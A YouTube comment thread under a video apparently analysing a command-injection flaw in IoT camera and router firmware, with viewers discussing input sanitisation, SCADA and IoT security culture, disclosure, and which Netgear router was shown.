      @reaperinsaltbrine5211 3 месяца назад +1

      To be fair: the SCADA world started way before globally connected networks were a reality and the sunk cost of all those systems make upgrading very costly. Also there are issues with QA and legal certfifications and the like.. Also: industrial control systems should be separated (if only for safety reasons) from other networks, with very narrow and well defined doors to the outside world. And frankly if operational safety and data/communications security are in conflict, I usually would pick safety.

    • @JarheadCrayonEater
      @JarheadCrayonEater 3 месяца назад

      @@reaperinsaltbrine5211, even with the separation, security was kicked down the timeline in the devices and PLC's. Until Stuxnet, there wasn't as big of a push for security, especially on the implementation side. At that time, manufacturers had considered and adopted it, but it wasn't used as it should have been.
      My comment was to focus on the implementation side, mostly, since that's what was carried over into home automation and IoT. Complacency in those industries was not a good example, yet was followed in the big IoT movement when it reached the market.

    • @reaperinsaltbrine5211
      @reaperinsaltbrine5211 3 месяца назад

      @@JarheadCrayonEater You have valid points. Although I think the "IoT" crappiness is more the result of extremeely low profit margins than anything else. Also people's preferring convenience over anything else. About complacency: may have a role in it in many places.
      The devices presented in the video are products of the typical Valley rent-seeking startup mentality. What frightens the crap out of me that this thinking is no creeping into medical devices, too, see NeuraLink: I don't want to have to do anything with those. Btw I do NOT have cameras, lights, fridge, anything that is allowed to communicate outside my network without expilcit permission. Hell, I deliberately stuck with good old mechanical lightswitches and a dumb fridge :D
      These things will fade out like any other fad, the question is after how many damage?

    • @JarheadCrayonEater
      @JarheadCrayonEater 3 месяца назад +1

      @@reaperinsaltbrine5211 , you have great points as well.
      It's not just one thing, as is usually the case. I'll just never forget when I started hearing the term "home automation" being used daily. I was a control system engineer on the pump stations in NOLA, among other industries, and just had to laugh at some of my stuff I saw coming out. Thinking "oh, boy, a lot of people are going to get rich, and a lot of others are about to find out the risks".

    • @reaperinsaltbrine5211
      @reaperinsaltbrine5211 3 месяца назад +1

      @@JarheadCrayonEater oh, boy, a lot of people are going to get rich, and a lot of others are about to find out the risks". Yeah...seems it is not only my experience. I sometimes surprised the whole thing didn't collapse on us yet :o) In the last ~20 years I mostly do infrastucture ops and the kludge-on-kludge patchwork I work with everyday LOL. Not to mention the kludges I put in there just to keep it rolling :/ New shiny things always get money....maintaining the guts of the system is an uphill battle :)

  • @ronny332
    @ronny332 3 месяца назад +2

    Nothing really changed in the last 20 years. The people/companies still don't care about simple variable cleaning. Thanks for sharing 🙂

  • @tekneinINC
    @tekneinINC 3 месяца назад +5

    4:36 : I’m gonna say that’s a Netgear Nighthawk?

  • @AnotherFreakingDude
    @AnotherFreakingDude 3 месяца назад +2

    11:42 When he _OOFd_ , I really felt that

  • @ZackWhitbord
    @ZackWhitbord 3 месяца назад +13

    Sexually frustrating indeed

  • @chocolate_squiggle
    @chocolate_squiggle 3 месяца назад +1

    Ugh, I'm not a programmer, just been around IT long enough to be familiar with some concepts. Over the years I've written myself stupid heinous shell scripts thousands of lines long, which I know competent programmers would cringe at. But as amateurish as my scripting is, I always deliberately included lots of sanity checks for any arguments / input. And for other actions. Yes because I don't want my script deleting a wrong file but even where that's not a possibility, I did it simply for the practice & the habit because I know that is a CORE COMPETENCY of programming which I may want to explore one day.
    This sort of shit is frustrating even for us who aren't programmers. Thanks for the explanation of it.

  • @AndreSomers
    @AndreSomers 3 месяца назад +3

    So, why is it claimed to be “unpatchable”, as this seems like quite a simple thing to fix.

    • @MorbidEel
      @MorbidEel 3 месяца назад +1

      I think it is unpatchable in the sense that there won't be a patch available because it is a discontinued product

  • @sprytnychomik
    @sprytnychomik 3 месяца назад +1

    9:06 pro tip: try using fzf - a command-line fuzzy finder, for finding files and/or input lines. Works like a charm in CLI workflow.

  • @Vixikats
    @Vixikats 3 месяца назад +4

    *Shows Router guts* "Every router in this family was vulnerable to a zero-day-"
    Me, looking 3 feet to my right seeing the exact router he just held up...
    Hmm.

    • @GetFitEatRight
      @GetFitEatRight 3 месяца назад +1

      Install Fresh Tomato and move on with your life.

  • @min3craftpolska514
    @min3craftpolska514 Месяц назад +1

    I'm taking a wild guess, it's probably netgear

  • @LiveseyMD
    @LiveseyMD 3 месяца назад +4

    The worst thing is that this has already happened in the past.
    Humans never learn...

    • @natescode
      @natescode 3 месяца назад +2

      Yup. Ever 5 years or so some company leaves passwords in plain text or allows SQL injection

  • @emanuellandeholm5657
    @emanuellandeholm5657 3 месяца назад +2

    Internet of Shit. We warned about these devices more than a decade ago. Now the chickens have come back to roost and my surprise is 0%.

  • @MrJake-bb8bs
    @MrJake-bb8bs 3 месяца назад +3

    But they've tried to sanitize the input and remove any double quotes (because the parameter is enquoted in ")
    The thing is bash/sh still parses it. They could've got away with this if they used single quotes as these are not parsed by the shell.
    Or just don't run pipe so simple things into a shell

    • @patsonical
      @patsonical 3 месяца назад +2

      > They could've got away with this if they used single quotes as these are not parsed by the shell.
      Then the attacker can just inject a single quote to close the string and follow up with whatever command they please anyway

    • @MrJake-bb8bs
      @MrJake-bb8bs 3 месяца назад

      @@patsonical They did this absolute minimum of removing quotes

  • @krisbruenn1082
    @krisbruenn1082 2 месяца назад

    I can see the code when I run the video in landscape mode on my phone. You are the greatest, and this video is a keeper.

  • @rtothec1234
    @rtothec1234 3 месяца назад +3

    If you have built in cameras on your laptop do yourself a favor and buy yourself a six pack of webcam slide covers. $5 solution for a major problem.
    You just glue them to your screen or notch and can block your cam for the 99% of the time you are not using it.

  • @l4t3nc1
    @l4t3nc1 2 дня назад

    Thank you for your independent rules, it's amazing how much you love what you do!

  • @DaremKurosaki
    @DaremKurosaki 3 месяца назад +17

    I really hope it isn't, but that router looked like a netgear nighthawk.

    • @TeejMcSteez
      @TeejMcSteez 3 месяца назад +6

      It looks like I was a chump who bought one back in the day too 😭

    • @YaySyu
      @YaySyu 3 месяца назад

      ​@@TeejMcSteezDude I connected my old nighthawk 6 months ago and in my router logs was a message from the shadow server foundation warning me that they detected a vulnerable router with their scanners. I found the message because my computer caught ransomware and I was investigating logs. Look them up, im serious. it was terrifying

  • @TheDudeAbidesYo
    @TheDudeAbidesYo Месяц назад

    It's always a treat watching your show. I always learn something new.

  • @CoreDump451
    @CoreDump451 3 месяца назад +6

    I actually made a presentation about Mirai back in 2018 for my security class. Man it feels like yesterday

    • @IanBPPK
      @IanBPPK 3 месяца назад +2

      I had a legal and ethics in computing course during the semester that the October 2016 Dyn ttack occurred. My group's assigned topic had to do with IoT devices. We had half of our project handed to us on a silver platter with that attack.

  • @olokelo
    @olokelo 3 месяца назад +1

    6:00 Security by obscurity? Firmware can be dumped from flash or intercepted during update. Not sure if not having firmware available on the website is a good excuse to have security problems in it.

  • @zelllers
    @zelllers 3 месяца назад +15

    INTERNET OF SHIT

  • @ericytff7388
    @ericytff7388 3 месяца назад +1

    Its 5am im on 4 hours of sleep and on my way to the airport, Thanks for zooming in LLL

  • @sinistar3198
    @sinistar3198 3 месяца назад +3

    4:00 I am going to vomit.

  • @Karn0010
    @Karn0010 3 месяца назад

    Not much of a programmer myself, but you break these things down so well that I get a basic understanding of why things like this are bad.

  • @offtheball87
    @offtheball87 3 месяца назад +3

    This smells like code someone wrote at 2am as a part of a proof of concept that just stuck around into production, and no one's ever gone back, because that part of the code works and isn't driving new features.
    Which is part of why the feature focus of software development these days irks me. Our jobs are framed features that solve user stories, or enablers to features that solve user stories, but so rarely on upkeep. This code needed to be torn out and rewritten long ago, but customers aren't asking for that.

    • @1783W
      @1783W 3 месяца назад

      @@offtheball87 customers definitely want safety. It seems more like a leadership problem.

    • @offtheball87
      @offtheball87 3 месяца назад +1

      @1783W they do, but it's an invisible benefit. If your focus is delivering value every sprint, you can easily misinterpret that to be delivering visible value every sprint. It's a leadership problem, but I think it's broader than the leadership of any given organisation.

    • @Bramble20322
      @Bramble20322 3 месяца назад +1

      @@1783W You didnt even know this flaw existed until this video, why would fixing this bring any perceptible value to you? Customers dont care about this stuff, really. There should be a dedicated agency to regulate this kind of issue.

  • @ai-aniverse
    @ai-aniverse 3 месяца назад

    I think this definitely falls into gross negligence. The problem is:
    *Who wrote it
    *What certifications they had
    *What certifications / standards are even applicable?
    *What standards are even being presumed by the customer?

  • @k1ngjulien_
    @k1ngjulien_ 3 месяца назад +36

    OMG they are litteraly just writing a string to a driver file!!
    WE HAVE A WRITE SYSCALL WHY ARE YOU SPAWNING A SHELLLLL!?!?!?!?!?!
    EVEN WITHOUT SANITIZATION THAT WOULD HAVE EASIER, FASTER AND SAFER

    • @supercellex4D
      @supercellex4D 3 месяца назад

      This is why I hate Unix

    • @k1ngjulien_
      @k1ngjulien_ 3 месяца назад +13

      @@supercellex4D lol what? windows has the same things lol

    • @flyinginthedark6188
      @flyinginthedark6188 3 месяца назад +6

      Instead of snprintf + system, they could have done fopen + fprintf + fclose, but that's one line more to type, probably too lazy to do it

    • @not-pyroman
      @not-pyroman 3 месяца назад +13

      @@supercellex4D
      blame the devs for their bad practice? Nah
      Blame the OS? Of course, because it's *definitely* the fault of the OS

    • @supercellex4D
      @supercellex4D 3 месяца назад +2

      @@not-pyroman Only Unix insists on magic files over documented predictable APIs

  • @catdisc5304
    @catdisc5304 3 месяца назад +1

    Thanks triple L, you're the best!

  • @Gunstick
    @Gunstick 3 месяца назад +3

    If they would have written their cgi code in bash, then they would not need to call system and the code is then secure.
    Yes.
    Most secure code for web applications is... the shell!
    Fight me!

    • @__christopher__
      @__christopher__ 3 месяца назад

      Well, the ultimate step in the exploit was exploiting bash (actually sh, which depending on the system may or may not be bash).

    • @Gunstick
      @Gunstick 3 месяца назад

      @@__christopher__ what is counterintuitive but true: if the cgi is written in bash, you cannot exploit it, because instead of calling system() you just directly execute the thing. And if you directly execute, there is no exploitation possible.

  • @palme7414
    @palme7414 3 месяца назад

    single handedly explained whole route people teach themself over decades, good job. btw why didn't you talk about the "unpatchable" nonsense in article title ?

  • @Arina-hs4hi
    @Arina-hs4hi 3 месяца назад

    I have zero clue what you are talking about 90% of the time but as a 2nd semester comp sci student, I love the structure of these videos! It’s fairly easy to follow along and it motivates me to learn more about cybersecurity:)

  • @jerrody5400
    @jerrody5400 3 месяца назад +20

    Researchers be like:
    - Found unpatchable 0-day vulnerability in cameras? Let's post it into public!

    • @AndrewTSq
      @AndrewTSq 3 месяца назад +21

      This is good I think. Cause the hackers who already found the exploit use it.. so if you do not say anything, that means these people can record you in your home ... if they tell everyone about it, those people can turn off the camera.

    • @kentacy69
      @kentacy69 3 месяца назад

      Do you really have enough trust in any company to think that they'd mention about massive vulnerability or do you prefer if everyone was living in ignorance?

    • @Bramble20322
      @Bramble20322 3 месяца назад

      @@kentacy69 Well, knowing that this wont be fixed and that there's probably something similtar in the gear we're all using right now, i'd be tempted to choose ignorance just so i can be a little less anxious about this stuff.

  • @jamess1787
    @jamess1787 3 месяца назад +1

    Thanks Triple L, youre the best

  • @BrokenSoul79x
    @BrokenSoul79x Месяц назад

    Good way of "spreading awareness" and making sure _everybody_ know what to exploit and where... I'm _sure_ that does SO much good. 😑

  • @AlecMaly
    @AlecMaly 3 месяца назад

    Thanks for showing the vulnerable code, need more of this type of content.

  • @JoeJoeTater
    @JoeJoeTater 3 месяца назад +1

    Thanks, Triple-L. You're the best!

  • @RealILOVEPIE
    @RealILOVEPIE 3 месяца назад +1

    Netgear Nighthawk R7000v1 would be my guess for the router. Good thing I replaced the firmware on mine on day 1 with an alternative.

  • @scaredyfish
    @scaredyfish 3 месяца назад +1

    The function is called cgi_safe_snprintf, which I would naively assume is doing some sort of sanitization.

  • @SourceCodeDeleted
    @SourceCodeDeleted 3 месяца назад

    Yeah another one of these. I have seen tons of them. And it's weird that they never really get fixed or resolved. Even when a newer version of the same router comes out. It's like they start from scratch each time.

  • @tasherratt
    @tasherratt 3 месяца назад +1

    What about this bug is uncatchable? Couldn't sanitation be added to the function by the manufacturer relatively simply and a new firmware published?

  • @bvcdi
    @bvcdi 3 месяца назад

    As a low level software developer this channel is exactly what this area needs. This sub domain is filled with people that release in productions products with parts of generic demo software. They think if they know how to use Arduino or other hobby tools like that they are qualified to develop highly integrated devices with complex systems. I know there is a pressure from the management to develop fast products, but I think we should have to courage to say wait a little, let me write the code, and stop copy code that we have no idea what contains. Anyway.....I may be considered and old dinosaur, but I like to have every part of my code write by me and my guys.....so that if any thing happens we can understand why and from where it is happening. Yes this may take long, but surely helps during the life time of the project and also adds to the security of the product. Yeah use opensource code, but review it first and try to identify any weakness it may contain, don't copy-paste just so that management is happy. Any way....nice video...liked it!

  • @ShuckleII
    @ShuckleII 19 дней назад +1

    13:15 What you're referring to is pretty much the Dunning Kruger effect.

  • @daviddunmore8415
    @daviddunmore8415 3 месяца назад

    Always validate input to a function, I've spent ours in the wee small hours fixing programs because there was no validation. The problem was usually nulls in a numeric field in a file coming from outside the business.

  • @raddastronaut
    @raddastronaut 3 месяца назад

    This is such a good channel.
    Great content and breakdowns.

  • @ItsQualitycontent
    @ItsQualitycontent 2 месяца назад

    I tend to put any devices that are not using wpa3 enterprise under a separate lan interface. This is somewhat helpful by preventing my main systems from also being compromised due to an insecure device on the local level.

  • @hesar1975
    @hesar1975 3 месяца назад

    its ALWAYS the same way, ages ago we developed some protocols like smtp, pop, http and similar, guys writing the code NEVER thought about bad actors attacking those, that is why now we are fighting hard to have safer versions of such protocols, in parallel, it happened to e.g. machinery/cars communications protocols, not a single engineer developing CAN bus was expecting CAN bus exposed via wi-fi, and obviously for IoT it is even more difficult as very often it is coded by not very skilled people, never ever having any security experience, and their managers having such neither (obviously it also increases costs when cost is crucial to sell such crap), greetings from Poland, I love your vids sir

  • @harriet-x.x
    @harriet-x.x 3 месяца назад +2

    That router is a netgear ! Not sure which model exactly looks like my old bussiness one i bought over 3 years ago

    • @TC1727
      @TC1727 3 месяца назад

      nighthawk R7000

  • @approximately82kangaroos19
    @approximately82kangaroos19 3 месяца назад +1

    "Internet of Things? More like Internet of Shit." - My friend from college

  • @cameramaker
    @cameramaker 3 месяца назад

    Looking at 12:20 ... line 308 is actually converting the argument into integer, but then its not used except for a comparison on 312. The proper way would be %d in the snprintf :)

  • @XRatedPoetry
    @XRatedPoetry 3 месяца назад

    Ghidra properly decoding the entire file is probably the craziest thing in this video

  • @jonwatte4293
    @jonwatte4293 3 месяца назад +1

    Downloadable firmware isn't bad -- open auditing is step one of a strong security engineering culture.
    If your security relies on obscurity, the bad guys will still find it but the good guys will have a harder time diagnosing it!

  • @lachlanwilger5044
    @lachlanwilger5044 3 месяца назад

    Thanks for doing a deep dive into the actual part of the firmware itself that caused the vulnerability!

  • @VredesbyrdNoir
    @VredesbyrdNoir 20 дней назад

    Thanks LLL, you're the best!

  • @TheCocoaDaddy
    @TheCocoaDaddy 3 месяца назад

    Wow, this is nuts! Thanks for posting!

  • @KW-ir5mf
    @KW-ir5mf 3 месяца назад

    If that's not bad enough, how about all your devices from your service provider. SWIM from Direct TV constantly ARP scanned my LAN and sent some unknown encrypted data out somewhere as does those TV boxes and USBs on your LAN. Total irritation in isolation. After constant firewall twiddling, I finally gave up and just ran two CAT6 cables on separate nets not just subnets, everywhere to separate them. Then use a no storage live image OS on an old PC for general net browsing. Just when you get things settled the industry introduces another one like separate BlueTooth IP stacks hooking right into your net adapter. What a hassle.